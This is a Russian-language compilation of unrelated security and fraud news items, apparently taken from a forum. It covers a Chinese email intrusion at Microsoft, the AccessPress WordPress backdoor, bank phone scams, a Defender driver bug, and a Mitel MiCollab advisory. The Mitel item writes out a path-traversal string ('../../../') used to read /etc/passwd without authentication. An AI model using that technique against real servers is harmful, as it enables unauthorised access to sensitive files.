системе RouteOS, и такие привилегии обычно может иметь базовое ПО, но не
пользователь.
(c) Мария Нефёдова
The New York Times
учетные записи электронной почты
Взлом, совершенный китайской группой, которая, по словам компании, занималась
шпионажем, оставался незамеченным в течение месяца.
Китайские хакеры, намеревающиеся собирать разведданные о Соединенных Штатах,
получили доступ к учетным записям электронной почты правительства, сообщила
Microsoft во вторник вечером.
Атака была целенаправленной, по словам человека, проинформированного о
вторжении в правительственные сети, хакеры искали конкретные учетные записи, а
не выполняли широкомасштабное вторжение, которое могло бы высосать огромное
количество данных. Адам Ходж, представитель Совета национальной безопасности
Белого дома, заявил, что никакие секретные сети не пострадали. Оценка того,
сколько информации было получено, продолжается.
Microsoft заявила, что в общей сложности около 25 организаций, включая
государственные учреждения, были скомпрометированы хакерской группой, которая
использовала поддельные токены аутентификации для получения доступа к
отдельным учетным записям электронной почты. По словам Microsoft, хакеры имели
доступ по крайней мере к некоторым учетным записям в течение месяца, прежде
чем была обнаружена утечка. В нем не указаны затронутые организации и
учреждения.
Сложность атаки и ее целенаправленный характер позволяют предположить, что
китайская хакерская группа либо была частью разведывательной службы Пекина,
либо работала на нее. «По нашим оценкам, этот противник занимается шпионажем,
например, получением доступа к системам электронной почты для сбора
разведывательной информации», — написал Чарли Белл, исполнительный вице-
президент Microsoft, в своем блоге во вторник
[вечером](https://translate.google.com/website?sl=auto&tl=ru&hl=ru&u=https://blogs.microsoft.com/on-
the-issues/2023/07/11/mitigation-china-based-threat-actor/) .
Хотя утечка оказалась гораздо меньше по масштабу, чем некоторые недавние вторжения, такие как взлом SolarWinds со стороны России в 2019 и 2020 годах, она могла предоставить информацию, полезную для китайского правительства и его разведывательных служб, и угрожала еще больше обострить отношения между Соединенными Штатами. и Китай.
Уязвимость, которой воспользовались хакеры, оказалась в облачной безопасности
Microsoft и была впервые обнаружена правительством США, которое немедленно
уведомило компанию, сказал г-н Ходж.
Внутри правительства атака показала значительный пробел в кибербезопасности в
системе защиты Microsoft и подняла серьезные вопросы о безопасности облачных
вычислений, сказал человек, проинформированный о вторжении. Правительство
перемещает данные в облако, что обещает лучший доступ к информации и
повышенную безопасность, поскольку исправление уязвимостей происходит быстрее.
В США также используются засекреченные облачные серверы, но у них больше
протоколов безопасности.
Человек, проинформированный о вторжении, сказал, что правительственные
требования безопасности должны были предотвратить нарушение, и что Microsoft
попросили предоставить дополнительную информацию об уязвимости.
«Мы по-прежнему держим поставщиков государственных закупок США на высоком
уровне безопасности», — сказал г-н Ходж.
Взлом произошел в деликатный момент в американо-китайских отношениях,
поскольку администрация Байдена [стремится снизить напряженность](https://www-
nytimes-com.translate.goog/2023/07/10/us/politics/biden-china-
diplomacy.html?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=ru) , которая обострилась в
последние месяцы в результате нескольких инцидентов, включая транзит
китайского воздушного шара-шпиона через Соединенные Штаты. Это может усилить
критику за то, что администрация Байдена недостаточно делает для сдерживания
китайского шпионажа.
Клифф Симс, бывший пресс-секретарь директора национальной разведки в
администрации Трампа, сказал, что Китай воодушевился тем, что президент Байден
не выступил против Пекина из-за его попыток повлиять на недавние выборы.
«Нам нужно серьезно обсудить, сколько хакерских атак мы будем терпеть, прежде
чем принимать меры», — сказал г-н Симс.
Г-н Белл в своем блоге сообщил, что люди, пострадавшие от взлома, были
уведомлены и что компания завершила работу по смягчению последствий атаки. Но
правительственные чиновники продолжают просить компанию предоставить более
подробную информацию об уязвимости и о том, как она возникла, по словам
человека, проинформированного о вторжении.
Microsoft заявила, что ей сообщили о вторжении и компрометации 16 июня. В
сообщении в блоге компании говорится, что китайская хакерская группа впервые
получила доступ к учетным записям электронной почты месяцем ранее, 15 мая.
Microsoft не сообщила, сколько учетных записей, по ее мнению, могло быть
скомпрометировано китайскими хакерами.
Китай проводит одну из самых агрессивных и самых эффективных операций по
взлому разведывательных данных в мире.
За прошедшие годы Пекин осуществил серию взломов, в результате которых удалось
украсть огромное количество правительственных данных. В 2015 году [утечка
данных, очевидно, осуществленная](https://www-nytimes-
com.translate.goog/2015/07/10/us/office-of-personnel-management-hackers-got-
data-of-millions.html?_x_tr_sl=auto&_x_tr_tl=ru&_x_tr_hl=ru) хакерами,
связанными с китайской службой внешней разведки, похитила огромное количество
записей из Управления кадров.
При взломе SolarWinds, который произошел во времена администрации Трампа,
российские спецслужбы использовали уязвимость в программном обеспечении для
получения доступа к тысячам компьютерных систем, в том числе многих
государственных учреждений. Взлом был назван в честь программного обеспечения
для управления сетью, которое российские агентства использовали для
проникновения в компьютеры по всему миру.

](https://www.nytimes.com/2023/07/11/us/politics/china-hack-us-government- microsoft.html?smid=url-share)
The hack, by a Chinese group that the company said was intent on conducting espionage, went undetected for a month.
 www.nytimes.com
В Харькове будут судить четырех мужчин, обвиняемых в мошенничестве. По данным следствия, они незаконно вывели 36 млн гривен с банковского счета местной предпринимательницы.
О завершении досудебного расследования и передаче обвинительного акта в суд Харьковская областная прокуратура и областное управление Национальной полиции сообщили в четверг, 19 мая.
Членами преступной группы следствие считает пятерых человек, один из них — частный исполнитель. В Дзержинский (Холодногорский) районный суд Харькова переданы обвинительные акты в отношении четверых.
Согласно версии правоохранителей, исполнитель, вступив в сговор с сообщниками, зарегистрировал фиктивное исполнительное производство на основе заведомо поддельных документов. Они свидетельствовали, что предпринимательница якобы задолжала по договору займа 33 млн гривен. Исполнитель наложил арест на 36,3 млн гривен на счету женщины: 33 млн были впоследствии выведены как погашение долга, остальная сумма пошла на оплату исполнительного долга и штрафов.
По данным следствия, исполнитель получил за свои услуги 3,3 млн гривен, 33 млн
— разделили между собой остальные члены преступной группы.
Выведенные средства злоумышленники обналичили в банковских учреждениях.
В полиции заявили, что потерпевшей уже вернули 33 млн гривен, 3,3 млн — арестованы на счету частного исполнителя.
Обвиняемым инкриминируют мошенничество в особо крупных размерах и подделку документов в составе организованной группы (ч. 4 ст. 190, ч. 1 ст. 358, ч. 3 ст. 28 Уголовного кодекса Украины). Частного исполнителя обвиняют в мошенничестве и злоупотреблении полномочиями (ч. 4 ст. 190, ч. 3 ст. 365−2 УКУ). Если вину обвиняемых докажут в суде, им грозит до 8 лет лишения свободы.
Дело вели следователи Следственного управления ГУНП в Харьковской области под процессуальным руководством областной прокуратуры. За оперативное сопровождение отвечали сотрудники харьковского уголовного розыска.
Злоумышленникам [удалось](https://jetpack.com/2022/01/18/backdoor-found-in- themes-and-plugins-from-accesspress-themes/) встроить бэкдор в 40 плагинов и 53 темы оформления для системы управления контентом WordPress, разрабатываемых компанией AccessPress, которая заявляет, что её дополнения используются на более чем 360 тысячах сайтов. Результаты разбора инцидента пока не приводятся, но предполагается, что вредоносный код удалось внедрить в ходе компрометации сайта AccessPress, внеся изменения в предлагаемые для загрузки архивы с уже выпущенными релизами, так как бэкдор присутствует только в коде, распространяемом через официальный сайт AccessPress, но отсутствует в тех же выпусках дополнений, распространяемых через каталог WordPress.org.
Наличие вредоносных изменений было выявлено исследователем из компании JetPack (подразделение компании Automatic, занимающейся разработкой WordPress) в ходе изучения вредоносного кода, обнаруженного на сайте одного из клиентов. Анализ ситуации показал, что вредоносные изменения присутствовали в WordPress- дополнении, загруженном с официального сайта AccessPress. Остальные дополнения того же производителя также оказались подвержены вредоносной модификации, позволяющей получить полный доступ к сайту с правами администратора.
В ходе модификации злоумышленники добавили в архивы с плагинами и темами оформления файл "initial.php", который был подключён через директиву "include" в файле "functions.php". Для запутывания следов вредоносное содержимое в файле "initial.php" было закамуфлировано в виде блока данных в кодировке base64. Вредоносная вставка под видом получения изображения с сайта wp-theme- connect.com загружала в файл wp-includes/vars.php непосредственно код бэкдора.
Первые сайты, включающие вредоносные изменения в дополнениях AccessPress были выявлены в сентябре 2021 года. Предполагается, что именно тогда в дополнения и был подставлен бэкдор. Первое уведомление компании AccessPress о выявленной проблеме осталось без ответа и внимания AccessPress удалось добиться только после привлечения к разбирательству команды WordPress.org. 15 октября 2021 года поражённые бэкдором архивы были удалены с сайта AccessPress, а 17 января 2022 года были выпущены новые версии дополнений.
Компания Sucuri [отдельно изучила](https://blog.sucuri.net/2022/01/accesspress-themes-hit-with-targeted- supply-chain-attack.html) сайты, на которых были установлен поражённые версии AccessPress и выявила наличие загруженных через бэкдор вредоносных модулей, осуществляющих рассылку спама и перенаправление переходов на мошеннические сайты (модули были датированы 2019 и 2020 годами). Предполагается, что авторы бэкдора продавали доступ к скомпрометированным сайтам.
Темы оформления, в которых зафиксирована подстановка бэкдора:
Code:Copy to clipboard
accessbuddy 1.0.0
accesspress-basic 3.2.1
accesspress-lite 2.92
accesspress-mag 2.6.5
accesspress-parallax 4.5
accesspress-ray 1.19.5
accesspress-root 2.5
accesspress-staple 1.9.1
accesspress-store 2.4.9
agency-lite 1.1.6
aplite 1.0.6
bingle 1.0.4
bloger 1.2.6
construction-lite 1.2.5
doko 1.0.27
enlighten 1.3.5
fashstore 1.2.1
fotography 2.4.0
gaga-corp 1.0.8
gaga-lite 1.4.2
one-paze 2.2.8
parallax-blog 3.1.1574941215
parallaxsome 1.3.6
punte 1.1.2
revolve 1.3.1
ripple 1.2.0
scrollme 2.1.0
sportsmag 1.2.1
storevilla 1.4.1
swing-lite 1.1.9
the-launcher 1.3.2
the-monday 1.4.1
uncode-lite 1.3.1
unicon-lite 1.2.6
vmag 1.2.7
vmagazine-lite 1.3.5
vmagazine-news 1.0.5
zigcy-baby 1.0.6
zigcy-cosmetics 1.0.5
zigcy-lite 2.0.9
Плагины, в которых выявлена подстановка бэкдора:
Code:Copy to clipboard
accesspress-anonymous-post 2.8.0 2.8.1 1
accesspress-custom-css 2.0.1 2.0.2
accesspress-custom-post-type 1.0.8 1.0.9
accesspress-facebook-auto-post 2.1.3 2.1.4
accesspress-instagram-feed 4.0.3 4.0.4
accesspress-pinterest 3.3.3 3.3.4
accesspress-social-counter 1.9.1 1.9.2
accesspress-social-icons 1.8.2 1.8.3
accesspress-social-login-lite 3.4.7 3.4.8
accesspress-social-share 4.5.5 4.5.6
accesspress-twitter-auto-post 1.4.5 1.4.6
accesspress-twitter-feed 1.6.7 1.6.8
ak-menu-icons-lite 1.0.9
ap-companion 1.0.7 2
ap-contact-form 1.0.6 1.0.7
ap-custom-testimonial 1.4.6 1.4.7
ap-mega-menu 3.0.5 3.0.6
ap-pricing-tables-lite 1.1.2 1.1.3
apex-notification-bar-lite 2.0.4 2.0.5
cf7-store-to-db-lite 1.0.9 1.1.0
comments-disable-accesspress 1.0.7 1.0.8
easy-side-tab-cta 1.0.7 1.0.8
everest-admin-theme-lite 1.0.7 1.0.8
everest-coming-soon-lite 1.1.0 1.1.1
everest-comment-rating-lite 2.0.4 2.0.5
everest-counter-lite 2.0.7 2.0.8
everest-faq-manager-lite 1.0.8 1.0.9
everest-gallery-lite 1.0.8 1.0.9
everest-google-places-reviews-lite 1.0.9 2.0.0
everest-review-lite 1.0.7
everest-tab-lite 2.0.3 2.0.4
everest-timeline-lite 1.1.1 1.1.2
inline-call-to-action-builder-lite 1.1.0 1.1.1
product-slider-for-woocommerce-lite 1.1.5 1.1.6
smart-logo-showcase-lite 1.1.7 1.1.8
smart-scroll-posts 2.0.8 2.0.9
smart-scroll-to-top-lite 1.0.3 1.0.4
total-gdpr-compliance-lite 1.0.4
total-team-lite 1.1.1 1.1.2
ultimate-author-box-lite 1.1.2 1.1.3
ultimate-form-builder-lite 1.5.0 1.5.1
woo-badge-designer-lite 1.1.0 1.1.1
wp-1-slider 1.2.9 1.3.0
wp-blog-manager-lite 1.1.0 1.1.2
wp-comment-designer-lite 2.0.3 2.0.4
wp-cookie-user-info 1.0.7 1.0.8
wp-facebook-review-showcase-lite 1.0.9
wp-fb-messenger-button-lite 2.0.7
wp-floating-menu 1.4.4 1.4.5
wp-media-manager-lite 1.1.2 1.1.3
wp-popup-banners 1.2.3 1.2.4
wp-popup-lite 1.0.8
wp-product-gallery-lite 1.1.1
В России в прошлом году зафиксировали рекорд по объему украденных средств у банковского клиента. Об этом рассказал начальник управления противодействия кибермошенничеству Сбербанка Сергей Велигодский в кулуарах выездного заседания межфракционной рабочей группы Госдумы по выработке предложений по борьбе с преступлениями в сфере информационно-коммуникационных технологий, передает корреспондент РБК.
«Это не клиент Сбербанка, это клиент другого крупного банка. Это женщина, 54 года. Сумма: 400 млн руб.», — рассказал Велигодский. Речь идет о схеме, когда жертва сама снимает деньги со счета и переводит их на счет мошенников в другой банк.
По словам представителя Сбербанка, мошенники позвонили женщине, представившись сотрудниками службы безопасности банка, клиентом которого она является, и заявили, что «сейчас будут спасать деньги». Женщина согласилась и сообщила им, что у нее на счету было 14 млн руб. «Они говорят: отлично, берем, снимаем и несем», — рассказал Велигодский.
После этого женщина сообщила мошенникам, что на счету в другом банке у нее хранятся еще 380 млн руб. «Они такие: мы сейчас с вами общаться не будем, это деньги очень серьезные. Сейчас вам позвонит «сотрудник ФСБ» и будет вами заниматься. Ей позвонили «ФСБ» и дальше ее начали разматывать. И вот она в течение месяца снимала эти деньги и отправляла их «спасателям», — пересказал этот случай Велигодский.
Согласно исследованию группы «Тинькофф», в прошлом году мошенники похищали у россиян в среднем 13,9 тыс. руб. за один раз. Это на 8% меньше среднего объема украденного в 2019 году (15 тыс. руб.). Как говорится в докладе, снижение связано с тем, что банки следят за крупными сомнительными операциями. «Чтобы не вызвать подозрение у служб фрод-мониторинга, мошенники стремятся проводить меньшие суммы несколькими операциями», — объяснили авторы.
По данным аналитиков, всего в 2020 году мошенники украли у банковских клиентов на 70% больше, чем в предыдущем, а число случаев мошенничества выросло на 60%. Самым популярным каналом, где мошенники находили своих жертв, стали объявления о продаже товаров и услуг на специальных сайтах и в соцсетях, а также поддельные интернет-магазины. Звонки от имени банка заняли второе место по распространенности — они использовались в 13% от всех случаев мошенничества — и первое по объему хищений — 30%.
Организация RIPE NCC является одном из пяти региональных интернет- регистраторов (RIR), выполняющих распределение интернет-ресурсов, а также связанную с этим регистрацию и координацию деятельности. В частности RIPE NCC управляет пространством IP-адресов в Европе, на Ближнем Востоке и части Центральной Азии. Членами RIPE NCC выступают более 20 000 организаций в 75 странах (обычно это крупные интернет-провайдеры и корпорации), которые работают в качестве локальных интернет-регистраторов (LIR) и занимаются распределением пространства IP-адресов среди других организаций и компаний в своей стране.
На этой неделе представители RIPE NCC сообщили, что недавно организацию пытались взломать.
«В прошлые выходные RIPE NCC Access, наш сервис single sign-on (SSO), пострадал в результате злонамеренной атаки типа credential-stuffing, что привело к небольшому простою», — гласит заявление RIPE NCC.
Click to expand...
Напомню, что термином credential-stuffing обозначают ситуации, когда имена пользователей и пароли похищаются с одних сайтов, а затем используются против других. То есть злоумышленники имеют уже готовую базу учетных данных (приобретенную в даркнете, собранную самостоятельно и так далее) и пытаются применить эти данные, чтобы авторизоваться на каких-либо сайтах и сервисах под видом своих жертв.
RIPE NCC Access используется для входа на все сайты RIPE, включая My LIR, Resources, RIPE Database, RIPE Labs, RIPEstat, RIPE Atlas, а также the RIPE Meeting. Компрометация любой учетной записи могла создать огромные проблемы, как для самой организации, так и для владельцев учетных записей.
Дело в том, что, к примеру, RIPE NCC официально исчерпала IPv4-адреса еще в ноябре 2019 года, а в настоящее время за адресами IPv4 во всем мире идет настоящая охота: они пользуются огромным спросом, в том числе и на черном рынке. Этот рынок регулярно подпитывается захваченными блоками адресов IPv4, а его клиентами обычно выступают различные хак-группы, которые, например, используют захваченные блоки адресов, для рассылки спама и обхода фильтров.
Хотя расследование инцидента еще продолжается, уже сообщается, что специалистам RIPE NCC удалось противостоять атаке, и ни один аккаунт в итоге не был взломан. Всем членам организации теперь настоятельно рекомендуется включить двухфакторную аутентификацию для учетных записей Access.
Источник: xakep.ru/2021/02/19/ripe-ncc-hack-attempts/
В 2018 году издание Bloomberg опубликовало серию статей, рассказывающую об аппаратных «закладках», которые якобы были обнаружены на серверных платах Supermicro и позволяли китайским хакерам скомпрометировать их.
Так как это оборудование используют крупные технические компании, включая Apple и Amazon, разразился грандиозный скандал. Представители Amazon и Apple поспешили категорически опровергнуть заявления Bloomberg, глава Apple говорил, что Bloomberg нужно отозвать этот материал, и даже АНБ сообщало, что это была «ложная тревога». В итоге вся эта история затихла, но удостоилась сразу двух наград Pwnie: как «самый перехайпленный баг» и «самый крупный epic fail».
Теперь, спустя три года, журналисты Bloomberg подготовили новый объемный доклад на все ту же тему. На этот раз издание ссылается на данные 50 разных источников в правительстве и частном секторе (в основном неназванных) и заявляет, что продукция Supermicro более 10 лет используется спецслужбами Китая. Причем спецслужбам США якобы прекрасно известно об этом, однако информация замалчивается ради изучения атак и создания эффективных средств защиты.
В новой статье упоминаются три конкретных инцидента:
То есть Bloomberg снова пишет о том, что продукция Supermicro (в частности материнские платы для серверов) содержит скрытые «закладки». В статье упоминаются злонамеренные изменения на уровне BIOS, необходимые для загрузки и выполнения шпионского кода, скрытого в прошивке. Якобы данный код нужен, в том числе, для атак на других вендоров.
Также в статье утверждается, что еще в 2012 году ФБР начало контрразведывательную операцию, в ходе которой были получены ордера на наблюдение за группой сотрудников Supermicro. Журналисты не знают, продолжается ли это расследование до сих пор, но утверждают, что ФБР сотрудничало с частным секторов, чтобы изучить «шпионские микросхемы», скрытые на материнских платах.
В ответ на очередную порцию обвинений в свой адрес представители Supermicro опубликовали длинное заявление, в котором вновь все отрицают:
«Статья Bloomberg — это смесь из разрозненных и неточных утверждений, появившихся много лет назад. В ней приведены надуманные выводы, которые вновь не выдерживают никакой критики.
Фактически, в прошлом месяце Агентство национальной безопасности США снова сообщило Bloomberg, что оно придерживается своих комментариев, данных в 2018 году и “не может подтвердить, что этот инцидент или последующие описанные меры реагирования когда-либо имели место”.
Невзирая на утверждения Bloomberg о предполагаемых расследованиях, связанных с кибер- или национальной безопасностью, которые якобы проводятся уже более 10 лет, ни правительство США, ни наши партнеры или клиенты ни разу не связывались с Supermicro по поводу этих предполагаемых расследований».Click to expand...
Как и три года назад, на этот раз никто не представил каких-либо фактических доказательств существования «шпионских чипов», зато Bloomberg опять критикуют ИБ-специалисты, включая, например, Тэвиса Орманди из Google Project Zero.
__https://twitter.com/x/status/1360272443118477314
В новом отчете Bloomberg фигурирует мало названных источников, но один из них – это Мукул Кумар (Mukul Kumar), глава безопасности компании Altera. Он уверяет, что узнал о шпионских чипах во время несекретного брифинга. «Это был шпионаж на самой плате. На плате была микросхема, которой не должно было там быть, и она “звонила домой”, не в Supermicro, а в Китай», — цитирует Bloomberg.
По следам новой статьи Bloomberg журналисты издания The Register провели собственное небольшое расследование: они поговорил с бывшим руководителем крупной полупроводниковой компании, который попросил не называть его имени. К удивлению журналистов, тот счел чип, упомянутый в отчете Bloomberg, имеющим право на жизнь, а сам отчет достоверным.
«Я держал в руках физические улики и встречал [подобные разработки] нескольких правительств», — заявил источник. По его словам, в подобных операциях преуспели Китай, Израиль и Великобритания, а также такими разработками занимаются Франция, Германия и Россия.
Также неназванный спикер The Register говорит, что атаки, подобные описанным Bloomberg, действительно случаются, но как правило, они направлены на получение доступа к критически важным системам, и речь в таких случаях идет о национальной безопасности. По его словам, софтверные атаки реализовать куда проще, но их также легче обнаружить. Зато сложность современного аппаратного обеспечения серьезно затрудняет поиск таких «закладок».
Источник: xakep.ru/2021/02/16/supermicro-spy-chips/
В составе Microsoft Defender Antivirus (ранее просто Windows Defender) исправили уязвимость, связанную с повышением привилегий. Интересно, что этот баг появился в коде около 12 лет назад и влиял на все версии Defender для Windows 7 и выше, выпущенные после 2009 года.
Уязвимость, обнаруженная экспертами SentinelOne в ноябре прошлого года, получила идентификатор CVE-2021-24092, и она также распространяется на другие продукты безопасности Microsoft, включая Microsoft Endpoint Protection, Microsoft Security Essentials и Microsoft System Center Endpoint Protection.
Проблема была обнаружена в драйвере BTR.sys (он же Boot Time Removal Tool), который используется для удаления файлов и записей реестра, созданных вредоносным ПО. Исследователи считают, что уязвимость не замечали так долго из-за «характера активации этого конкретного механизма».
«Мы полагаем, что эта уязвимость не обнаруживалась до сих пор, потому как этот драйвер обычно не присутствует на жестком диске, но сбрасывается и активируется при необходимости (со случайным именем), а затем удаляется», — гласит отчет компании.
Click to expand...
В сущности, когда BTR.sys удаляет вредоносный файл, он временно заменяет его новым и безопасным. Исследователи обнаружили, что система никак не проверяет этот новый файл, и в итоге злоумышленник может добиться перезаписи не того файла или даже запуска вредоносного кода, повысив свои привилегии до уровня администратора.
Исправление будет автоматически установлено во всех системах, где работают уязвимые версии Microsoft Defender и включены автоматические обновления. Баг был исправлен в рамках февральского «вторника обновлений». Последней версией Microsoft Malware Protection Engine, подверженной этой уязвимости, является 1.1.17700.4. Первая версия, в которой была исправлена ошибка, это 1.1.17800.5.
«Хотя кажется, что эта уязвимость не использовалась, злоумышленники, вероятно, придумают, как использовать ее в незащищенных системах. Кроме того, поскольку уязвимость присутствует во всех версиях Windows Defender, начиная примерно с 2009 года, вероятно, многие пользователи не смогут применить выпущенное исправление, что делает их уязвимыми для будущих атак», — резюмируют эксперты SentinelOne.
Click to expand...
Источник: xakep.ru/2021/02/15/windows-defender-bug/
В iOS 17.5 из-за сбоя начали восстанавливаться старые фотографии.
У одного из пользователей после обновления появились нюдсы с его девушкой, снятые в 2021 году, а у другого в галерее появились фото, снятые в 2010 году.
Пользователи обвинили Apple в нарушении закона о защите персональных данных. По их мнению, компания хранит фотографии на серверах даже после удаления контента с устройства и из iCloud.
После этого бага, количество сообщений с просьбой «всё вернуть» станет больше.
Специалисты обнародовали PoC эксплоит, который объединяет в себе исправленную критическую уязвимость в Mitel MiCollab и 0-day проблему произвольного чтения файлов. В итоге злоумышленник может получить доступ к файлам на сервере. Mitel MiCollab — корпоративная платформа для совместной работы. Она объединяет в себе мессенджер, голосовые и видеозвонки, SMS-сообщения, конференции, а также предлагает интеграцию с Microsoft Teams и другими приложения, поддержку мобильности и инструменты для совместной работы.
Как рассказывают эксперты [WatchTowr Labs](https://labs.watchtowr.com/where- theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and- an-0day), Mitel MiCollab подвержена критической уязвимости [CVE-2024-41713](https://www.mitel.com/support/security-advisories/mitel- product-security-advisory-misa-2024-0029) (9,8 балла по шкале CVSS), которая связана с недостаточной проверкой input'а в компоненте NuPoint Unified Messaging (NPM), что в итоге приводит к реализации атак типа path traversal.
Исследователи рассказывают, что обнаружили CVE-2024-41713 почти случайно, пытаясь воспроизвести другую критическую уязвимость — [CVE-2024-35286](https://www.mitel.com/support/security-advisories/mitel- product-security-advisory-24-0014) (9,8 балла по шкале CVSS). Эта SQL-инъекция в [компоненте NPM](https://www.mitel.com/document- center/applications/collaboration/micollab/nupoint-unified- messaging/102/en/nupoint-unified-messaging-general-information-guide) позволяла получить доступ к конфиденциальной информации и выполнить произвольные операции с БД. Баг был исправлен разработчиками Mitel в конце мая 2024 года с релизом MiCollab 9.8 SP1 (9.8.1.5).
Новая уязвимость CVE-2024-41713 связана с тем, что если в HTTP-запрос к
компоненту ReconcileWizard осуществляется инъекция path traversal строки
(../../../
), это приводит к попаданию злоумышленника в корень сервера, и
позволяет получить доступ к конфиденциальной информации (например,
/etc/passwd
) без какой-либо аутентификации.
Однако проблема CVE-2024-41713 была устранена в MiCollab 9.8 SP2 (9.8.2.12) и более поздних версиях. Но в WatchTowr Labs предупреждают, что для извлечения конфиденциальных данных этот обход аутентификации можно объединить с другой еще неисправленной 0-day уязвимостью произвольного чтения файлов, доступной после аутентификации.
«Успешная эксплуатация этой уязвимости может позволить злоумышленнику получить несанкционированный доступ и повлиять на конфиденциальность, целостность и доступность системы, — сообщают разработчики Mitel в [бюллетене безопасности](https://www.mitel.com/support/security-advisories/mitel-product- security-advisory-misa-2024-0029), посвященном CVE-2024-41713. — В случае успешной эксплуатации уязвимости злоумышленник сможет получить неавторизованный доступ к информации, включая неконфиденциальные данные о пользователях и сети, а также выполнить несанкционированные административные действия на сервере MiCollab Server».
Также в компании отметили, что пока неисправленная уязвимость локального
чтения файлов (CVE пока нет), о которой пишут ИБ-эксперты, является
результатом недостаточной очистки input'а. В этом случае раскрытие информации
ограничивается неконфиденциальной системной информацией, и в компании
подчеркивают, что этот баг не позволяет модифицировать файлы или повышать
привилегии.
источник

](https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713)
Contribute to watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713 development by creating an account on GitHub.
github.com
**Росфинмониторинг сообщил о росте подозрительных операций в криптовалюте
**
В России зафиксирован рост подозрительных операций в криптовалюте. Об этом
сообщил статс-секретарь, заместитель директора
Росфинмониторинга
Герман Негляд, его слова
приводит РИА Новости.
В ходе международного форума «Актуальные вопросы противодействия отмыванию
доходов и финансированию терроризма» он отметил, что такая тенденция
прослеживается на фоне увеличения общего объема операций «квартал от квартала,
год от года». Негляд также подчеркнул высокий риск использования криптовалюты
в преступных целях, в первую очередь — для наркорасчетов.
Ранее глава Банка России
Эльвира Набиуллина
допустила, что регулятор может
использовать криптовалюту во внешних расчетах в виде эксперимента.
**При этом она отметила, что в ЦБ по-прежнему придерживаются мнения о том,
что****вРФ криптовалюта использоваться не
должна.
****
**
Бартер, и только бартер!
Двумя задержанными в Нигерии сотрудниками Binance оказались вице-президент по глобальной разведке и расследованиям биржи Тигран Гамбарян и директор торговой платформы в Западной и Восточной Африке Надим Анджарвалла. Об этом сообщает Wall Street Journal.
Топ-менеджеры были приглашены властями Нигерии, чтобы обсудить текущие проблемы Binance. По информации издания, 25 февраля они прибыли в столицу страны — Абуджу.
После первой встречи Гамбаряна и Анджарваллу отвезли в отели, сказали упаковать вещи и перевезли в «гостиницу», управляемую Агентством национальной безопасности Нигерии.
С этого момента они насильно удерживаются нигерийскими властями.
Ранее в интервью BBC пресс-секретарь президента Закари Миджиньява заявлял, что сотрудники биржи находятся под следствием и «подвергаются допросу в рамках расследования, проводимого органами безопасности по вопросам регулирования валютного рынка».
СМИ также сообщали о том, что у топ-менеджеров Binance конфисковали паспорта.
Напомним, власти Нигерии обеспокоились влиянием криптовалютных бирж на экономику страны. Телекоммуникационные компании получили распоряжение от правительства заблокировать доступ к ряду платформ, включая Binance, Coinbase и Kraken.
В начале марта появилась информация, что власти Нигерии якобы потребовали от Binance компенсацию в размере $10 млрд за манипулирование обменным курсом найры. Однако впоследствии и биржа и советник президента Нигерии Байо Онануга опровергли эту информацию.
Также местный Комитет Палаты представителей по финансовым преступлениям потребовал от CEO криптовалютной биржи Binance Ричарда Тенга предстать перед ведомством для дачи показаний по факту предполагаемого финансирования терроризма и отмывания денег.
Несколько жителей американского Хьюстона (штат Техас) в возрасте от 26 до 62 лет подозреваются в присвоении крупной суммы денег с кредитных карточек, украденных ими из почтовых отправлений. Суммарно с 210 карт их стараниями за шесть месяцев работы пропали 1,23 миллиона долларов.
Согласно обвинительному заключению, мужчины воровали письма, в которых находились новые кредитные карты и банковские выписки владельцев счетов. После этого они звонили в финансовые учреждения с просьбой активировать пластик, увеличить кредитные лимиты и частично изменить сведения о нем. В дальнейшем баланс расходовался на покупку товаров и услуг, подарочных карт, а также просто обналичивался в банкоматах.
Всем мужчинам предъявлены обвинения в заговоре (максимальный срок — до пяти лет), банковском мошенничестве (до 30 лет), краже почты (также до пяти лет) и краже личных данных при отягчающих обстоятельствах (влечет за собой обязательное двухлетнее тюремное заключение). Потенциальный штраф может составить около миллиона долларов.
source: click2houston.com/news/local/2023/12/05/houston-men-charged-with- stealing-more-than-12m-in-mail-theft-scheme-activating-stolen-credit-cards
57-летнему жителю Новосибирской области объявило предостережение ФСБ за попытки несанкционированного доступа к государственным информационным ресурсам. Пожилой хакер использовал вирусные программы, чтобы взломать сайты областного Минцифры и НГУ.
Как рассказали в пресс-службе УФСБ РФ по Новосибирской области, мужчина 1966 года рождения «с целью изучения информационной уязвимости защищенных сайтов», применил специальные программы для атак на сайты и, как итог, получения доступа к информации Министерства цифрового развития и связи Новосибирской области и ФГАОУ ВО «Новосибирский национальный исследовательский государственный университет» (НГУ).
Данные попытки взлома были выявлены правоохранителями, после чего мужчину задержали и объявили предостережение о недопустимости неправомерных действий. «С учетом наличия в деятельности гражданина условий для совершения преступления, предусмотренного ч. 1 ст. 272 УК РФ (Неправомерный доступ к компьютерной информации), в целях его предупреждения УФСБ России по Новосибирской области объявило официальное предостережение жителю Новосибирска. В случае возникновения повторных подобных ситуаций гражданин понесет уголовное наказание», — говорится в сообщении ведомства.
Отмечается, что за 2023 год возбуждено уже 15 уголовных дел в отношении новосибирцев за совершение компьютерных преступлений, также 11 граждан были осуждены, троим объявлены предостережения, 13 привлечено к административной ответственности. Ранее рассказывалось, как хакер из Новосибирска с подельниками украл миллионы рублей у нескольких компаний в разных регионах РФ с помощью вируса-трояна и фишинговых сайтов.
Хакеры помогли жительнице США восстановить доступ к забытому криптокошельку, передает Tengrinews.kz со ссылкой на Crypto News.
Ронда Камперт из штата Иллинойс в 2013 году приобрела 6 биткоинов по цене 80 долларов (около 35 тысяч тенге) за каждый. Потратив часть цифровых денег, вскоре она забыла о своем криптокошельке, а затем и вовсе потеряла доступ. Для того чтобы вернуть накопленное состояние, ей пришлось обратиться за помощью к хакерам.
В конце 2017-го Камперт увидела в новостях, что стоимость биткоина выросла почти до 20 тысяч долларов (около 8,5 миллиона тенге). Женщина захотела обналичить средства, но не смогла из-за того, что у нее отсутствовали некоторые данные для входа в биткоин-кошелек - программу, хранящую набор секретных чисел.
"У меня был лист бумаги с паролем, но я понятия не имела, какой у меня идентификатор кошелька", - рассказала женщина, добавив, что тогда она посчитала ситуацию безнадежной и прекратила попытки восстановить доступ.
Click to expand...
